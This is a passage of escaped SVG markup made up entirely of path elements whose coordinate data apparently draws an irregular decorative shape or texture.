d=\"M727.2,56.4c-3.8-.1-4.5,0-3.9.3,2,0,3.2.1,4.4.2C727.3,56.7,724.7,56.6,727.2,56.4Z\"></path>\n <path d=\"M737.8,55.9c1.9,0,3.2.1,4.4.2,0-.3-.9-.6-3.4-.7C739.4,55.6,738.9,55.8,737.8,55.9Z\"></path>\n <path d=\"M869.9,52.8c1.3.4-2.2.3-.8.6,3.3.1,5.4.1,7,0C876.1,53.1,873.9,52.9,869.9,52.8Z\"></path>\n <path d=\"M626,40.8c-3.5-.1-4.8.4-2.3.5C625.1,41.2,627.5,41.2,626,40.8Z\"></path>\n <path d=\"M647.7,38.7c-3.6.1-2.1.7,2.2.9C647.5,39.2,649.9,38.9,647.7,38.7Z\"></path>\n <path d=\"M639,35.1a4,4,0,0,0-1.6-.3c.2.2.3.4.5.6,3.7.2,6-.2,2.4-.4C640.3,35.1,640.2,35.2,639,35.1Z\"></path>\n <path d=\"M755.1,31.3c-2.7,0-3.2-.2-5.8-.2,5.2.7-5.5,1,1.3,1.4C753,32.2,750.2,31.4,755.1,31.3Z\"></path>\n <path d=\"M688.7,25.2a10.17,10.17,0,0,1-2.7,0c-.3-.1,0-.3-1.7-.4,1.2.5.4,1,4.9.9C683.7,25.5,694.9,25.5,688.7,25.2Z\"></path>\n <path d=\"M706.2,19.9a26.2,26.2,0,0,1-2.8-.1c-.4-.2.1-.4-1.8-.5-.4.2-2.8.2-2.3.5C702.5,20,705.5,20.3,706.2,19.9Z\"></path>\n <path d=\"M739.6,13.7c1-.1,1.7-.2,1.7-.4,1.1.4,3.7.8,5,1.2-.5-.4-3-.9-5.5-1.5a.08.08,0,0,1,.1.08v0a34.18,34.18,0,0,0-3.5-.3C738.5,13.1,736.3,13.5,739.6,13.7Z\"></path>\n <path d=\"M527.9,101.5c4.5.1,11.5.6,13,.5-5.8-.3-12.8-1.1-6.8-1.4-4.7-.2-.8.3-5.5.1.3-.1,1.8-.2,1-.4a31,31,0,0,0,4.2.1c-1.9-.4,2-.2,2.4-.4-8.4-.3-4,.6-13.7.2-5.8.7-1,1.9-1.3,3-.1.3-.7.6-2.2.9,2.2.3,2.9.1,4.4.3-4.5.1.1.4-2.1.7a41.51,41.51,0,0,1,6,.5c-2.8-.1-1.5.3-5.5.1-2.5-.1-.4-.5-3.3-.6.8.3-3.8.5-.8.6a98.06,98.06,0,0,1,10,.3c3.9-.6-.1-1.3-4.5-2,.1.1-1,.1-1.4,0,2.7.1,1.9-.2,3-.2h1c2.8.2,2.4.6,4.8.8a21.29,21.29,0,0,1,4.3.1c-5.7-1.4.5-1.9-8.1-2.9-.1.1.5.3-1.1.3C525.6,101.8,526,101.6,527.9,101.5Z\"></path>\n <path d=\"M732.3,103.2c-.7.3,4.1.3,3.3.6-6.8-.1-2.6.5-6.4.6,6.2-.1-.9.3.6.7,8.9-.4,4.4-1.6,7.7-2.3C729.7,102.6,738.3,103.3,732.3,103.2Z\"></path>\n <path d=\"M526,99.3c-2.3.1-8.6.3-5,.7C519.7,99.4,528.4,99.9,526,99.3Z\"></path>\n <path d=\"M524.2,94.1c4.2,0,1.8-.7,4.8-.9,8.1.5,10.1,1.7,1.6,1.8-1.4-.3,1.7-.2.9-.5-4.9,0-5.7,1.1,1.2,1.3-.8-.8,6.3-.8,10.1-1.2-1.7-.1-4-.1-4.4-.2,7.2.2.4-.4,5.2-.4-2,.2,5.1.4,4.3.2-3.4-.1-3.5-.4-6-.6,1.2.3-2.7.1-4,.2.2-.2-2.1-.3-3.1-.4,5.3-.1,7.5,0,9.4-.3-4.6-.2-4.2.1-7.1-.2,1.9.5-4.6.2-5.2.4l-.3-.3c-1.9,0-3.8-.1-5.7-.1C528.3,93.5,521.8,93.8,524.2,94.1Z\"></path>\n <path d=\"M536.7,95.7c2.9-.1,4.8-.3,6.5-.5C537.2,94.9,535.1,95.6,536.7,95.7Z\"></path>\n <path d=\"M734.1,99c3.5.1,2.9-.1,7,0C740.5,98.1,739.3,98.7,734.1,99Z\"></path>\n <path d=\"M519,89.8c8,.1.4-1.1-2.6-1.4-.6.2-6.7.7-3.7.6,2.4,0,2-.4,5.3-.3C515.9,89.2,521.6,89.4,519,89.8Z\"></path>\n <path d=\"M652.2,86.4c-1.3-.9-6.3-2.1-1-2.8-5.1,0-2.2.2-5.8-.2,2.4.7-11.4,1.2-3.7,2.1-1.7,0-4-.1-4.2,0,6.1.1,1,.4-1,.4,2.8.6-.4,1.4-1,2.1,3.4-.1,7.1.4,7.1.2-2-.1-1.8-.3-3.1-.4,8.8.2,6.5-.2,12.5,0-6.6-.3,1.6-1.2-5.2-1.2C646.8,86.3,651.5,86.5,652.2,86.4Z\"></path>\n <path d=\"M609.4,72.5c4.1.1,11.6,1,3.2.5.3.4,6.8.4,8.9.6-.5-.4-3.6-.6-4.9-.9C615.6,73.2,611.9,72.1,609.4,72.5Z\"></path>\n <path d=\"M603.1,63.8a15.43,15.43,0,0,1-2.8-.1,64,64,0,0,0,7.8.9C606.2,64.4,607.1,63.9,603.1,63.8Z\"></path>\n <path d=\"M601.6,63.6c-1.4-.3,7.4.3,2.7,0a6.88,6.88,0,0,1-1.5-.1c-.1-.1,2.4,0,2.6-.2C602,62.8,597.5,63.4,601.6,63.6Z\"></path>\n <path d=\"M599.9,60.1c-8.5-.4,4.4-.8-3.9-1.3-2.1.7-4.2,1.6-4.6,2.7C598.8,61.3,592.5,60.3,599.9,60.1Z\"></path>\n <path d=\"M754.7,60.9c2-.7,3.2-1.4,3.6-2.2-4.6-.1-1.6-.7-7.6-.7C760.3,58.7,749.6,59.9,754.7,60.9Z\"></path>\n <path d=\"M598.3,55.2c4.7-.2,2.4-.6,7.6-.8-9.4.2,4.6-.4-6.2-.7C598.3,54.6,597,54.4,598.3,55.2Z\"></path>\n <path d=\"M601,53.5c0-.2,4.6,0,3.9-.2-1.1-.1-2.8-.1-2.9-.2,2.1,0,5.3.2,5.6,0-3.9-.3,3.8-.7-2.2-.9,2.3.1,3.7-.1,1.2-.2a19.08,19.08,0,0,1-4,.1c.2.3,2.7.4,2,.7-4.1,0-.6.2-5.4.2C603.1,53,596,53.3,601,53.5Z\"></path>\n <path d=\"M600,49.2c9,.1.5.9,6.4,1-.7-.3,0-.4,2.6-.2,0-.6,1.8-.5-3.4-.7.6-.5,3.2-.2,5.2-.4-2.3,0-9.8-.6-7.3-.4C607.4,48.9,602.5,49.1,600,49.2Z\"></path>\n <path d=\"M643.7,37.3c-.2-.2.5-.2,1.1-.3-5.2-.1-10.6-.6-17-.4,1.5.2,1,.6,3.4.7,1.3-.4.4-.5,3.6-.7C634.5,37.1,643.4,36.9,643.7,37.3Z\"></path>\n <path d=\"M686.7,26.1a14.19,14.19,0,0,1-3.9.3c-.1-.1-.3-.1-1.5-.1a8.94,8.94,0,0,0,3.2.5C682.1,26.4,692.6,26.6,686.7,26.1Z\"></path>\n <path d=\"M722.6,95.4a28.18,28.18,0,0,0-7.5-.6c-.2.2,2.1.3,3.1.4-5.8-.1-12.8.2-6.4.6-9,.4-16.9,1.3-11.5,2.7-3.4.5-11.3,1.3-5.1,2.1-5,0-.7.8-3.3,1,1.7.1,3.4.1,3,.3-7.9,1.3-2.1,3-8.6,4.4,7.5.2,1.7.8,5.1,1.1.7-.4,4.7-.5,6.2-.8-1.7-.1-4-.1-4.3-.2a29.54,29.54,0,0,1,5.4-.2c4.4,0,1,.6,6.1.6-13.3-2.2,18.3-2.7,6.9-4.8a20.06,20.06,0,0,0,4.1-.1c-8-.6,5-1-2.7-1.5,7.2.2,3.1-.8,1.9-1,9.2-.5,1.1-1.8,7.5-2.6-2-.2-2.2-.4-4.7-.5,6.4.2,4.4-.2-.1-.1-.1-.2-.6-.4-1.8-.5,4.5,0,4.6.3,7.1.2C724.3,95.5,715.8,95.3,722.6,95.4Z\"></path>\n <path d=\"M750.3,110.5c-2.7-.3-.9.9.5,1.1C750.9,111.2,751.8,111.1,750.3,110.5Z\"></path>\n <path d=\"M770.6,108.3a42.59,42.59,0,0,0-7.2-1c4.7,1.1,1.7,1.7,5.2,2.9-.6-.5-.5-.8,2.8-.3C770.3,109,769.1,108.7,770.6,108.3Z\"></path>\n <path d=\"M766.9,104.6c1.4.3,2.1.5,4.2.8.8,0,1.2-.1.8-.4C769,104.6,769.1,104.9,766.9,104.6Z\"></path>\n <path d=\"M768.1,103c.7.6-1,1,3.8,1.8C771.2,104.4,774.4,104.3,768.1,103Z\"></path>\n <path d=\"M745.3,93.6c-4.8-1-3.5,0-.8.4C744.1,93.7,744.5,93.6,745.3,93.6Z\"></path>\n <path d=\"M768.6,95.7c-1.8-.1-.3.6,1.4,1C769.3,96.3,770.9,96.1,768.6,95.7Z\"></path>\n <path d=\"M914.7,118.4c0,.8-1.8-.5-5.3-1a21.54,21.54,0,0,0,4.5,1.4,5.88,5.88,0,0,1,2,.2C915.7,118.9,916.1,118.7,914.7,118.4Z\"></path>\n <path d=\"M745.2,89.2c-3.3-.6-3.5-.3-3.9-.1a9.76,9.76,0,0,0,3.4,1.1c.7-.2-1.8-.6-2.4-.9a21,21,0,0,0,4.1.5C745.2,89.5,745.2,89.4,745.2,89.2Z\"></path>\n <path d=\"M753.7,82.5c-.1-.4-3.3-.5-2.4-.9,3.1.7,2.8-.7-1.7-1.5-.1.5-1.2.5,1.6,1.3-8.4.1-9.5,2.2-5.5,4.9-2.2-.2-2.2.1-3.9,0,3.2,1.2-3.7,1.5,3.2,2.8-1.9-1.3,1.5-2.2,1.2-3.6-.1-.6-2.8-1.8,1.3-1.3-.2.1-1.4,0-.8.3,6.6,1-.3-.9,2.7-.6.6.5,2.9.6,1.3.8,2.8.5,2.6.2,2.9,0-1.8-.5-2.5-1.3-.5-1.1-2.2-.5-1.3-.2-4.2-.7.7.4.7,1.2-2.8.2,5.1.6-.2-1,2.5-.8a24.35,24.35,0,0,0,4.3.9c-.8-.6-.1-.4-3.4-1.1C751,82,754.4,83.1,753.7,82.5Z\"></path>\n <path d=\"M919.6,106.2c-2.8,1.6-6.4,2.3-6.4,4.9,1.7.4,4.5,1,5.5,1.4-5.8-1.2-.7.8-6.1-.6-.6.4-.8.8,1.7,1.6-1.1-.7,2.6.2,4.1.6-.2-.2.1-.3.8-.3-1.7-.5-4.5-.9-5.4-1.1,1.2-.2,3.5.2,7,.5-2.2-.8.2-.5.6-.8-6-1-.7-.9-3.7-1.7,1.3.2,1.4.1,3.1.4-1.6-.6-.5-.8.5-1-1.3-.3-2.4-.5-3.3-.8,5.3-.4,2-2.2,5.6-2.5l-2.1-.3A12.12,12.12,0,0,0,919.6,106.2Z\"></path>\n <path d=\"M929.1,114.2c-2.7-.4-4-.5-4-.2,2,.3,2.3.5,1.2.4,1,.2,2.1.3,3.1.5C928.3,114.4,928.3,114.4,929.1,114.2Z\"></path>\n <path d=\"M925.7,110.9c1,.6-1,.4-.6.8C929.6,112.6,928.9,111.5,925.7,110.9Z\"></path>\n <path d=\"M925.4,106.1c-3.8-1-8.8-.7-4.9,0C920.5,105.6,922.4,105.7,925.4,106.1Z\"></path>\n <path d=\"M888,100.6c-.3-.4,3.5-.3.5-1C889.5,100.2,884.6,99.8,888,100.6Z\"></path>\n <path d=\"M646.5,59.9c1,.2,2.1.3,3.1.5.3-.2,2.1-.3-1.4-.9C647.8,59.7,645.8,59.4,646.5,59.9Z\"></path>\n <path d=\"M911,102.4c-.1.3.6.7,2.4,1.1C912.7,103.1,914.8,102.9,911,102.4Z\"></path>\n <path d=\"M920.4,101.6c7.6,1.3.7-.6,3.6-.6C918,100.1,922.6,101.5,920.4,101.6Z\"></path>\n <path d=\"M954.4,106.1c-.9-.1-1.9.4.4.8C955.8,107,956.7,106.6,954.4,106.1Z\"></path>\n <path d=\"M934.9,101.7a10.32,10.32,0,0,1,2.2.5c-.8-.1-1.2-.1-.9.1,2.8.5,2.6.2,2.9,0C936.4,101.8,935.7,101.5,934.9,101.7Z\"></path>\n <path d=\"M926.5,98.2c-4.7-.7-.6,1.2-6.9-.3,1.9,1,3,1.3.8,1.7,4.7.8,3.4.1,4.8,0C920.3,98.5,929.4,99.4,926.5,98.2Z\"></path>\n <path d=\"M906,95.6c-2.6-.8.1-.6-4.5-1.4C901.8,94.6,902.5,95.1,906,95.6Z\"></path>\n <path d=\"M921.7,98.1c.8-.2,3.5-.1-.5-1C922,97.6,918.5,97.4,921.7,98.1Z\"></path>\n <path d=\"M956.7,102.7c1.6.1,3.4,0-1.3-.8C956.1,102.2,954.5,102.4,956.7,102.7Z\"></path>\n <path d=\"M929.9,97.1c1.1.4.6.7,2.4,1.1C933.8,98.2,933.8,97.6,929.9,97.1Z\"></path>\n <path d=\"M955,99.1c-2.7-.5-3.9-.1-1.8.4C953.8,99.4,955.7,99.6,955,99.1Z\"></path>\n <path d=\"M822.7,76.8c1.6,0,1.1.8,3.5,1.2-1.1-.6,1.3-.4.5-.9C824.2,76.8,820,76,822.7,76.8Z\"></path>\n <path d=\"M954.7,98.3a7.45,7.45,0,0,1-2-.1,5.75,5.75,0,0,0,2.3.8C955.2,98.9,956.1,98.7,954.7,98.3Z\"></path>\n <path d=\"M907.2,89.8c-1.4-.6,1.5,0,1.9-.1-2.5-.6-4.3-.4-7.2-.9C904.3,89.2,905.9,89.5,907.2,89.8Z\"></path>\n <path d=\"M946.5,95.4c-.7.2,1.8.6,3.4,1C951.2,96.2,950.4,95.8,946.5,95.4Z\"></path>\n <path d=\"M907.6,88.8c-.4.3-1.7-.5-3.2-.6a14.05,14.05,0,0,1-2.9,0,56,56,0,0,1,6.3,1.2C906.8,88.9,910.8,89.4,907.6,88.8Z\"></path>\n <path d=\"M887.5,85.1c-1.8-.3-3.3-.6-4.3-.8a5.13,5.13,0,0,0,2.4,1.1C884.7,84.8,887.2,85.3,887.5,85.1Z\"></path>\n <path d=\"M890.7,83.5c-2.2-.3-2.1-1.1-3.4-1,2.5.9-8.7-1.2-3.9,0C885.2,82.5,888,83.4,890.7,83.5Z\"></path>\n <path d=\"M897.9,84.4c-1.9-.2-4.7-.6-5-.4C896.3,84.6,897.8,84.7,897.9,84.4Z\"></path>\n <path d=\"M1056.2,110.9c2.9.5,2.9.2,2.9-.1C1055.8,110.2,1055.9,110.5,1056.2,110.9Z\"></path>\n <path d=\"M893.1,82.5a17.84,17.84,0,0,1-3.3-.8c1,.6-1.2,1,2.8,1.8C893.1,83.1,891.9,82.8,893.1,82.5Z\"></path>\n <path d=\"M923.4,87.3c-.4.3-5.3-.1.5,1C922.2,87.6,926.4,88,923.4,87.3Z\"></path>\n <path d=\"M930.9,84.8c1,.5-2.8-.2-1.8.3,1.1.2,2.1.3,3.1.5C931.6,85.1,934.5,85.5,930.9,84.8Z\"></path>\n <path d=\"M918.5,82.9c.3-1,1.3-.9,3-1.8-5.3-.9-5.7-.8-1.8.3-2-.4-2.2-.2-4.1-.6C919.4,81.8,914,82.1,918.5,82.9Z\"></path>\n <path d=\"M918.3,80.5c4.8.8,3.8,0,4.7-.3C919,79.6,919.6,80.3,918.3,80.5Z\"></path>\n <path d=\"M722.2,46.1c-4.1-.8-1.3,1.2-.5,1C721.8,46.5,721.5,46.4,722.2,46.1Z\"></path>\n <path d=\"M945,81.8a13,13,0,0,1-3.1-.4c3.8,1,1.2,1.1,4.8,1.9C945.9,82.8,947.5,82.4,945,81.8Z\"></path>\n <path d=\"M890.7,73.1c-3-.6-2.6-.3-5.2-.8-.2-.2-.4-.3-2.2-.6C882.7,72.2,890.6,73.5,890.7,73.1Z\"></path>\n <path d=\"M1009.7,91.9c-.1.2-3,.4,1.5,1.1C1010.4,92.6,1012.1,92.4,1009.7,91.9Z\"></path>\n <path d=\"M936.2,79.4c1.9.8-5.4-.9-5.1-.5,3.1.6,2.3.9,4.5,1.4C934.7,79.8,940.1,80.4,936.2,79.4Z\"></path>\n <path d=\"M741.9,46.7c-2.8-.4-4.4.5-1.5,1C740.5,47.2,741.8,47.1,741.9,46.7Z\"></path>\n <path d=\"M1001.9,89.8c-3.8-.9-1.6-.9-4.6-1.5.1.6,2.4,1.3,3.8,2C1000.1,89.8,1002.5,90.2,1001.9,89.8Z\"></path>\n <path d=\"M940.9,79.1c-.4.2-1.8.4.6,1.2C941.6,80.2,943.5,79.9,940.9,79.1Z\"></path>\n <path d=\"M935.5,77.9c-1.8-.3-3.3-.6-4.3-.8-.6.4,2.3.9,2.6,1.3-1.5-.3-1.9-.5-3.3-.8a.35.35,0,0,0,.1.2c-.7-.1-1.2-.2-1-.1,3.3.5,1.6.6,4.4,1.1,2.7,0,.4-.5-.5-1.2A13.6,13.6,0,0,0,935.5,77.9Z\"></path>\n <path d=\"M924.6,77.3c.2-.3,2.1-.8-.7-1.6C923.6,76.2,920.8,76.2,924.6,77.3Z\"></path>\n <path d=\"M764.7,49.9c.6-.2-3.8-1.3-5.4-1.2,1.9.3,2.5.5,2.3.7C762.6,49.6,763.6,49.7,764.7,49.9Z\"></path>\n <path d=\"M751.3,46.1c-2.5-.3-4.5-1.1-5.2-.9,1.6.4,3,1,1.4.9l2.1.3c.6.1,1.2.2,1,.1C746.7,45.7,753.5,46.9,751.3,46.1Z\"></path>\n <path d=\"M1049.1,95.4c-2.4-.4-4-.7-5.2-.8.2.2,0,.3,1.2.5C1044.4,94.8,1050.3,96.1,1049.1,95.4Z\"></path>\n <path d=\"M891.8,69.4c-2.5-.7-5.2-.7-7.4-1.3C884,68.5,889.8,69.2,891.8,69.4Z\"></path>\n <path d=\"M941.8,76.9c3.4,0,1.5.6,4.4,1.1.2-.5-1-1-5.6-1.7C940.8,76.5,940.4,76.6,941.8,76.9Z\"></path>\n <path d=\"M890.2,65.8c-5.8-.7-6.1,0-4.5.8,3.3.4,3.3-.2,5.8,0-3.5-.9-2.2,0-4-.2a8.44,8.44,0,0,0-1.2-.4C887.4,65.8,890.4,66.2,890.2,65.8Z\"></path>\n <path d=\"M1005.1,86.2c3.3.6,2.2,0,6.2.8-.2-.2.1-.3.8-.3C1009.3,86.4,1006.9,86.3,1005.1,86.2Z\"></path>\n <path d=\"M895.6,67.1c0,.1-.1.1-1-.1,0-.2-1-.4-2.3-.7.7.4-.9.6,1.4,1-.1-.1-.1-.2-.2-.4C895.9,67.5,898.6,67.7,895.6,67.1Z\"></path>\n <path d=\"M749.3,41.8c.1.4-3.3.4.5,1.1C749.3,42.5,752.4,42.5,749.3,41.8Z\"></path>\n <path d=\"M887.3,63.9a13,13,0,0,1-3.1-.4c-1,.4,3,1.1,4.6,1.7C889.6,65.1,889,64.3,887.3,63.9Z\"></path>\n <path d=\"M1130.5,104.1c1.3.2,1.5.4,3.2.6-.4-.3,1.3,0,1.9,0A21.88,21.88,0,0,0,1130.5,104.1Z\"></path>\n <path d=\"M779.9,45.1c3.5.6,5.6.3,1.8-.4C780.2,44.6,781.3,45.2,779.9,45.1Z\"></path>\n <path d=\"M971.3,76.1c-1,0-4.7-.1-.7.7a5.88,5.88,0,0,1,2,.2C968.9,76,974.2,76.9,971.3,76.1Z\"></path>\n <path d=\"M892.3,62.1c-4.3-.7-8.6-.3-4.6.6-.8-.4.2-.4,3,.2C886.9,61.8,895.8,63.1,892.3,62.1Z\"></path>\n <path d=\"M1084.6,94.9c2.7.2,2.5-.4-1.5-1.1C1084.3,94.3,1081.9,94.3,1084.6,94.9Z\"></path>\n <path d=\"M1051.7,88.7l-2.1-.3c-.6-.1-1.2-.2-1-.1,3.5.6-2.9,0,2.3.8C1049.9,88.6,1052.3,89,1051.7,88.7Z\"></path>\n <path d=\"M897.1,61.9c2.5.4.9.6-.8.3-1.1-.3-1.9-.6-3.3-1,.3.3-2,.4,1.5,1.1,1.1-.5,1.5.6,5.3,1C900.7,63.4,901,62.3,897.1,61.9Z\"></path>\n <path d=\"M1045.7,86.2c.3.3-.7.2-3-.2,0,.1.2.8,1.3.7C1042.4,86,1050.5,87.4,1045.7,86.2Z\"></path>\n <path d=\"M1027.2,83.8a20.39,20.39,0,0,1,2.2.6c.5-.2,3.6-.1-.4-.8C1030.1,84.1,1028.3,83.9,1027.2,83.8Z\"></path>\n <path d=\"M1008.3,78.7c-.3.2-2.9-.3-1.8.3a21.3,21.3,0,0,0,4.2.7c.2.2.1.4,2.3.7l-.3-.6C1009.4,79.3,1010.4,79.1,1008.3,78.7Z\"></path>\n <path d=\"M769.3,36.9c1.4-.2-3.6-.7-3.3-.9,4.7.6-2.5-.9,1.8-.4-2-.3-2.4-.5-4.3-.8.3.9,2.5,1.9-1.1,1.8,3.3.8,1.3,1.4,4.9,2.3.1-.5,1.3-1-.9-1.9,1.1-.1,4.5,1,4.1.5C768.1,37,765.1,35.9,769.3,36.9Z\"></path>\n <path d=\"M898.2,60.1l-5.2-.9c0,.3-1.8,0,1.3.7C894.2,59.6,898.2,60.4,898.2,60.1Z\"></path>\n <path d=\"M856.5,51.7c1.3.6-2,0-2.9.1a17.84,17.84,0,0,1,3.3.8C857.9,52.6,858.8,52.2,856.5,51.7Z\"></path>\n <path d=\"M795,42.2c-3-.7-.8-1.1-4.8-1.9C791.1,40.8,790.1,41.2,795,42.2Z\"></path>\n <path d=\"M836.8,48.8c-.7-.5,2.7.2,2.9-.1-1.4-.2-2.3-.4-3.2-.6C837.7,48.6,833.5,48.1,836.8,48.8Z\"></path>\n <path d=\"M911,60.6c-.3.2-4-.6-2.9,0C911.4,61.2,913.8,61.2,911,60.6Z\"></path>\n <path d=\"M747.2,33.1a5.88,5.88,0,0,1-2-.2c0,.3.8.6,2.4,1C746.2,33.3,750.4,33.8,747.2,33.1Z\"></path>\n <path d=\"M760.1,35.8c-.1-.4-1.2-.8-3.5-1.2,0,.2-3.4-.5-3-.2C756.3,34.9,756.9,35.3,760.1,35.8Z\"></path>\n <path d=\"M1052.6,84.4c-.1-.2-.1-.3-.2-.5-2-.3-4.5-.7-4-.3,1.8.3,2.6.3,3.2.5C1051.6,84.2,1051.7,84.2,1052.6,84.4Z\"></path>\n <path d=\"M889.9,57c-1.1-.5,2.6.2,2.9,0a28.82,28.82,0,0,1-4.3-.9C887.9,56.2,887.7,56.4,889.9,57Z\"></path>\n <path d=\"M842.5,48.7c1.7.3.7.4,2.3.7-1.7-.7,5.7.6,1.8-.3C847.5,49.6,841.6,48.3,842.5,48.7Z\"></path>\n <path d=\"M792.2,40.4c1.4-.4,3-1.3-2.2-2.6-3.1-.2,2.2,1.1,1.6,1.4a19.06,19.06,0,0,0-3.1-.4C792.8,39.5,789.2,39.7,792.2,40.4Z\"></path>\n <path d=\"M893.8,56.9c0-.3,1.7-.2,1.7-.5C892.6,55.9,891.5,56.4,893.8,56.9Z\"></path>\n <path d=\"M823.4,45.1c.5-.2,2.4.1,1.7-.4C822.8,44.4,819.8,44.5,823.4,45.1Z\"></path>\n <path d=\"M772.8,36.3c1.3-.1.9-.5-2.5-1.2C770.4,35.4,771.1,35.8,772.8,36.3Z\"></path>\n <path d=\"M1149.9,97.9c.7.4,1.2.8,4.5,1.3C1154.5,98.8,1152.9,98.4,1149.9,97.9Z\"></path>\n <path d=\"M768.8,33.8c.8-.3-5.4-1.3-5.3-1C766.4,33.2,766.3,33.4,768.8,33.8Z\"></path>\n <path d=\"M788,35.4c1.5.3,1.9.5,3.3.8-1.7-.8-1.4-1-2.7-1.7C788.6,34.9,787,34.8,788,35.4Z\"></path>\n <path d=\"M757.2,29.7a24.5,24.5,0,0,0,3.5,1.2C760.6,30.5,760.9,30.2,757.2,29.7Z\"></path>\n <path d=\"M822.2,40.4c3.2.5,4.3-.1,1.5-.9C824.5,40.1,819.4,39.6,822.2,40.4Z\"></path>\n <path d=\"M792.7,35.2c3.8.6,4-.2-.5-1A7.77,7.77,0,0,1,792.7,35.2Z\"></path>\n <path d=\"M771.3,30.8c-2.5-.4-2.5-.8-4.4-1.2,1,.7,1.1,1.4,5.9,2.3C773.3,31.5,766.8,30.3,771.3,30.8Z\"></path>\n <path d=\"M755.5,28.2c2.7.2-2.4-1.1.5-.9-2.8-.4-2.2-.6-4.3-.9C753.8,27.2,751.7,27.1,755.5,28.2Z\"></path>\n <path d=\"M769.3,28.7c-3.3-.6-1.8.1-3.9-.1,2.5.4,1.2.7,3.4,1.1a5.85,5.85,0,0,1,2,.2c-2.2-.9.8.1,1.9-.1C769.8,29,767.5,28.9,769.3,28.7Z\"></path>\n <path d=\"M894.1,49.3c-3.4-.7-2.9.4.4.8C895.2,49.9,891.9,49.2,894.1,49.3Z\"></path>\n <path d=\"M1097.3,82.7a4.69,4.69,0,0,0,2.5,1.3c-.6-.4,1.8.1.8-.4C1096.4,82.9,1101.5,83.4,1097.3,82.7Z\"></path>\n <path d=\"M833,38.6c-.4.1-3.3-.4-1.9.1,1.2.2,3,.5,3.2.6s0,.3,1.2.5C836.9,39.8,834.7,39.2,833,38.6Z\"></path>\n <path d=\"M768.9,27.8c-1,0-2-.1-3-.2.2-.2-.5-.5-2.3-.8-.4.3,2.5.9.3.7,2,.3,2.4.5,4.3.8C766.3,27.7,772.4,28.6,768.9,27.8Z\"></path>\n <path d=\"M773.8,28c-.8.1-4.2-.6-2.9.1,1.6.2,3.9.7,4.1.6a10.32,10.32,0,0,1-2.2-.5C772.8,28,777.4,28.7,773.8,28Z\"></path>\n <path d=\"M756.1,25.3c.2-.2,3.1.3,4,.2-2.4-.4-4-.7-5.2-.8C755.1,24.9,754.9,25,756.1,25.3Z\"></path>\n <path d=\"M775.5,27.5c-.2.2-3.8-.5-4-.3,3.8.5,1.9.7,5.4,1.2C776.2,28.1,777.9,27.9,775.5,27.5Z\"></path>\n <path d=\"M800.7,31.7c-5.5-1.1-2.1.5.2.5C798.3,31.7,800.5,31.7,800.7,31.7Z\"></path>\n <path d=\"M767,25.8c.4.3,9,1.8,5.2.9,0,.1-.1.1-1-.1-.2-.2,0-.3-1.2-.5C770.1,26.3,767.2,25.7,767,25.8Z\"></path>\n <path d=\"M798.2,30.4c-4.8-.6-3.8-.4-6.4-1.3-.3.3-.2.4-2.8.2,3.2.7,4.3.7,7.5,1.5,1.1,0,1.1-.1-.2-.5C797.5,30.4,798.7,30.6,798.2,30.4Z\"></path>\n <path d=\"M775,26.4c-3.3-.6-4.2-.6-5.1-.5,1.8.3,3.3.6,4.3.8C773.9,26.4,775.3,26.6,775,26.4Z\"></path>\n <path d=\"M868.2,41.4c-.6.3,5.7,1.5,6.5,1.4C872.5,42.4,870.4,41.9,868.2,41.4Z\"></path>\n <path d=\"M1213.9,98.1c-.4.2-2.2.4,1.4,1C1214.6,98.7,1216.3,98.5,1213.9,98.1Z\"></path>\n <path d=\"M1148.4,86.3c-1.6-.1-.9.7,2.5,1.3A7.85,7.85,0,0,0,1148.4,86.3Z\"></path>\n <path d=\"M1152.3,82.2c-1.8,1.1-9.7,2-4.9,4.1,4.7,0,9.5-.3,3.7-2.5,1.9,0,2.6.8,4.2.7C1151.7,83.3,1155.1,82.7,1152.3,82.2Z\"></path>\n <path d=\"M911.4,47c-.8-.4.1-.3,1.2-.2s2.4.3,2.7.3a22.5,22.5,0,0,0-2.7-.5C910,46.2,907.8,46.3,911.4,47Z\"></path>\n <path d=\"M860.1,36.5a5.77,5.77,0,0,0-2.3,1.2c2.7.4,4,.5,4,.2C857.7,37.1,863.6,37.4,860.1,36.5Z\"></path>\n <path d=\"M756.2,19.3c-1.5-.1-6.4-.6-2.8.3C752,18.9,759.3,20,756.2,19.3Z\"></path>\n <path d=\"M842,33.1c5.8,1.3,3.8,1.5,5.8,2.1.2-.2,4.9.8,4,.2-4.6-.6-3-.9-4.5-1.4C844.1,33.5,845.3,33.7,842,33.1Z\"></path>\n <path d=\"M850.7,35c1.5.3,1.9.5,3.2.8-1.7-.8-.4-.7.5-1C851.1,34.2,850.1,34.4,850.7,35Z\"></path>\n <path d=\"M1133.4,81.1c-4.5-.8-3.3,0,.3.6Z\"></path>\n <path d=\"M890,40.4c-2.4-.1,1.4.8,3.5,1.2C894.2,41.3,891.5,40.8,890,40.4Z\"></path>\n <path d=\"M820.8,29a41.32,41.32,0,0,0-5.2-.8c1.7.3.7.4,2.3.7.1-.1-.4-.4.9-.2S821,29.3,820.8,29Z\"></path>\n <path d=\"M851.3,34.3c1.7.1.1-1-2.4-1.1C852.2,33.9,846.6,33.5,851.3,34.3Z\"></path>\n <path d=\"M741.7,15.1c.2.2-.7.1-2-.2.7.3-.9.5,1.4.9C739.4,15.1,745.5,16,741.7,15.1Z\"></path>\n <path d=\"M912.7,44.2c1.7.2,2-.1.1-.5h-.1c-.4.1-2-.1-1.7.2C911.6,44,912.2,44.1,912.7,44.2Z\"></path>\n <path d=\"M755.6,15.7c-3.7-.6-3.3-.9-6.5-1.4,3.3.9,1.6,1.2,4.8,1.9C752.3,15.5,755.3,16,755.6,15.7Z\"></path>\n <path d=\"M862.3,32.9c1.5.6-5.3-.2.4.8C861.7,33.3,865.6,33.6,862.3,32.9Z\"></path>\n <path d=\"M909.2,40.2a5.13,5.13,0,0,0,2.4,1.1c1.2-.1-.3-.2.8-.4Z\"></path>\n <path d=\"M855.6,31a5,5,0,0,0-2.3-.8c-.5.1-2,0-2.9.1a28.64,28.64,0,0,1,3.2.6C853.7,30.8,853.8,30.7,855.6,31Z\"></path>\n <path d=\"M735,11.1c3.4.6,5,.7,5,.4A22,22,0,0,0,735,11.1Z\"></path>\n <path d=\"M1217.9,88c-.1-.3-.7-.8.7-.7C1214.2,86.6,1215.8,87.4,1217.9,88Z\"></path>\n <path d=\"M893.1,32.6c-.3-.4.5-.7-2.5-1.2C890.7,31.8,891.4,32.1,893.1,32.6Z\"></path>\n <path d=\"M885,29.7c.6.6-3.4-.5-5.2-.8-.5.1-2,0-2.9.1,3.2.2,10.4,1.6,12.3,1.5C887.4,30.2,886,29.9,885,29.7Z\"></path>\n <path 